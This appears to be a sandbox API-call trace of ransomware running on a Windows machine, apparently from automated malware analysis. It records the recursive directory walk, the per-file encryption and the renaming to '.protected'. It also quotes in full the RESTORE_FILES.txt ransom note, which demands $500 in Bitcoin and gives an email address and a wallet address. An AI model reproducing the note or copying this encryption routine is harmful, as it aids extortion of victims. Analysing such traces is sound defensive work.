lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.087] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") 
returned 155 [0080.087] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.087] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0080.088] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0080.088] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0080.088] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.088] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.089] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.089] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.089] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.089] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.090] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.090] CloseHandle (hObject=0x168) returned 1 [0080.090] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.protected") returned 165 [0080.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.protected")) returned 1 [0080.090] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.090] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.090] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0080.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.091] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.091] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.092] lstrlenA (lpString="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") returned 684 [0080.092] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.092] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.092] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.092] CloseHandle (hObject=0x164) returned 1 [0080.092] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.092] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0080.092] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0080.092] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0080.092] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0080.092] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0080.092] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it") returned 141 [0080.092] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0080.092] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0080.092] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*") returned 143 [0080.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.093] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.093] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.093] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.093] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\.") returned 143 [0080.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.093] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.093] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.093] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.093] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.093] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\..") returned 144 [0080.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.093] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") 
returned 155 [0080.093] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.093] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.094] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0080.094] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.094] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0080.094] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.094] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0080.094] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.094] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0080.094] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.095] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0080.095] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.095] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.095] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.095] CloseHandle (hObject=0x168) returned 1 [0080.095] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.protected") returned 165 [0080.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.protected")) returned 1 [0080.096] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.096] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.096] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0080.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.097] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.097] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.098] lstrlenA (lpString="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") returned 684 [0080.098] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.098] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.098] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.098] CloseHandle (hObject=0x164) returned 1 [0080.098] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0080.098] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0080.098] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja") returned 141 [0080.098] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0080.098] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0080.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*") returned 143 [0080.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.098] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.098] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.098] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.098] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.098] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\.") returned 143 [0080.099] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.099] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.099] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.099] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.099] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.099] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.099] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.099] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\..") returned 144 [0080.099] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.099] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.099] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.099] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.099] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") 
returned 155 [0080.099] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.099] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.099] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.099] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0080.100] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0080.100] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0080.100] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.100] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
